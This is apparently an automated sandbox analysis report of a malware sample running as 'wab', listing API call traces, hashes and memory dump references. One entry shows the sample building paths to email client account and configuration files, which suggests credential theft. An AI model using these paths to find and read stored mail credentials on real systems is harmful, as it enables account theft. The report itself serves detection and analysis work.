                                                                                                                                                                                                                      • Part of subcall function 352DC7E6: GetProcAddress.KERNEL32(00000000,352DC7F4), ref: 352DC804
                                                                                                                                                                                                                      • Part of subcall function 352DC7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC816
                                                                                                                                                                                                                      • Part of subcall function 352DC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC82A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction ID: 5d54e7991b6c4352c931a53600b4af29a6da5b7f8592dbd19d6c22903bbb2942
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A213B6555D3C26FF71387B44C04FA5FFD9AB172A0F184696D064EB143D6A48845C3A1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,352DC7F4), ref: 352DC804
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC816
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC82A
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,352DC7DD), ref: 352DC838
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 352DC860
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                    • Instruction ID: aa31d9a7952967ece6e97d3c95d5eea0b883116431badd1d7f470b703b23d418
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F04684A893C23CFA1341B40C44EB6DFDD9B272A0B100A12F039E7183CCA0890683F2
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,352D924F,?,00000000,?,00000000,?,352D9276,?,00000007,?,?,352D7E5A,?), ref: 352D5734
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,352D924F,?,00000000,?,00000000,?,352D9276,?,00000007,?,?,352D7E5A,?,?), ref: 352D5746
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                    • Opcode ID: d3fe541f40d63d2b8c33e3785d82c5e57e14c015f53e13a511bd75b8c17dd0ac
                                                                                                                                                                                                                    • Instruction ID: 6adcc4bc75381c18ffb9244e2f59c89d42c25b8f7b88d52871784b896c8e1c9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3fe541f40d63d2b8c33e3785d82c5e57e14c015f53e13a511bd75b8c17dd0ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5E08631A10605EBE7102FE0E84CB897FE9BB40792F500024F62CA6090DA709441C784
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 352D2645
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 352D2710
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 352D2730
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 352D273A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 352D2276
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 352D2285
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 352D228E
                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 352D229B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,352D2C3B,352DD1DC,00000017), ref: 352D2B21
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(352DD1DC,?,352D2C3B,352DD1DC,00000017), ref: 352D2B2A
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,352D2C3B,352DD1DC,00000017), ref: 352D2B35
                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,352D2C3B,352DD1DC,00000017), ref: 352D2B3C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 352D61DA
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 352D61E4
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 352D61F1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,352D4A8A,?,352E2238,0000000C,352D4BBD,00000000,00000000,00000001,352D2082,352E2108,0000000C,352D1F3A,?), ref: 352D4AD5
                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,352D4A8A,?,352E2238,0000000C,352D4BBD,00000000,00000000,00000001,352D2082,352E2108,0000000C,352D1F3A,?), ref: 352D4ADC
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 352D4AEE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 352D294C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D1B
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 352D1D37
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D4B
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D58
                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D72
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D7D
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D8A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1454806937-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 248 352d39be-352d39c8 249 352d3a6e-352d3a71 248->249 250 352d39cd-352d39dd 249->250 251 352d3a77 249->251 252 352d39df-352d39e2 250->252 253 352d39ea-352d3a03 LoadLibraryExW 250->253 254 352d3a79-352d3a7d 251->254 255 352d39e8 252->255 256 352d3a6b 252->256 257 352d3a55-352d3a5e 253->257 258 352d3a05-352d3a0e GetLastError 253->258 259 352d3a67-352d3a69 255->259 256->249 257->259 260 352d3a60-352d3a61 FreeLibrary 257->260 261 352d3a45 258->261 262 352d3a10-352d3a22 call 352d55f6 258->262 259->256 264 352d3a7e-352d3a80 259->264 260->259 263 352d3a47-352d3a49 261->263 262->261 268 352d3a24-352d3a36 call 352d55f6 262->268 263->257 267 352d3a4b-352d3a53 263->267 264->254 267->256 268->261 271 352d3a38-352d3a43 LoadLibraryExW 268->271 271->263
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 352D1038
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 352D104B
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 352D1061
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 352D1075
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 352D1090
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 352D10B8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrlenW.KERNEL32(?,?,?,?,?,352D10DF,?,?,?,00000000), ref: 352D1E9A
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrcatW.KERNEL32(?,?), ref: 352D1EAC
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrlenW.KERNEL32(?,?,352D10DF,?,?,?,00000000), ref: 352D1EB3
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrlenW.KERNEL32(?,?,352D10DF,?,?,?,00000000), ref: 352D1EC8
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrcatW.KERNEL32(?,352D10DF), ref: 352D1ED3
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 352D122A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                    • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 312 352d4b39-352d4b61 GetModuleHandleExW 313 352d4b86-352d4b8a 312->313 314 352d4b63-352d4b76 GetProcAddress 312->314 317 352d4b8c-352d4b8f FreeLibrary 313->317 318 352d4b95-352d4ba2 call 352d2ada 313->318 315 352d4b78-352d4b83 314->315 316 352d4b85 314->316 315->316 316->313 317->318
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,352D4AEA,?,?,352D4A8A,?,352E2238,0000000C,352D4BBD,00000000,00000000), ref: 352D4B59
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 352D4B6C
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,352D4AEA,?,?,352D4A8A,?,352E2238,0000000C,352D4BBD,00000000,00000000,00000001,352D2082), ref: 352D4B8F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,352D9C07,?,00000000,?,00000000,00000000), ref: 352D94D4
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 352D9590
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,352D9C07,00000000,?,?,?,?,?,?,?,?,?,352D9C07,?), ref: 352D95AF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,352D9C07,00000000,?,?,?,?,?,?,?,?,?,352D9C07,?), ref: 352D95E8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 977765425-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,352D10DF,?,?,?,00000000), ref: 352D1E9A
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 352D1EAC
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,352D10DF,?,?,?,00000000), ref: 352D1EB3
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,352D10DF,?,?,?,00000000), ref: 352D1EC8
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,352D10DF), ref: 352D1ED3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,352D190E,?,?,00000000,?,00000000), ref: 352D1643
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 352D165A
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,352D190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 352D1661
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?), ref: 352D1686
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcatlstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1475610065-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 352D715C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 352D717F
                                                                                                                                                                                                                      • Part of subcall function 352D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 352D5702
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 352D71A5
                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 352D71C7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
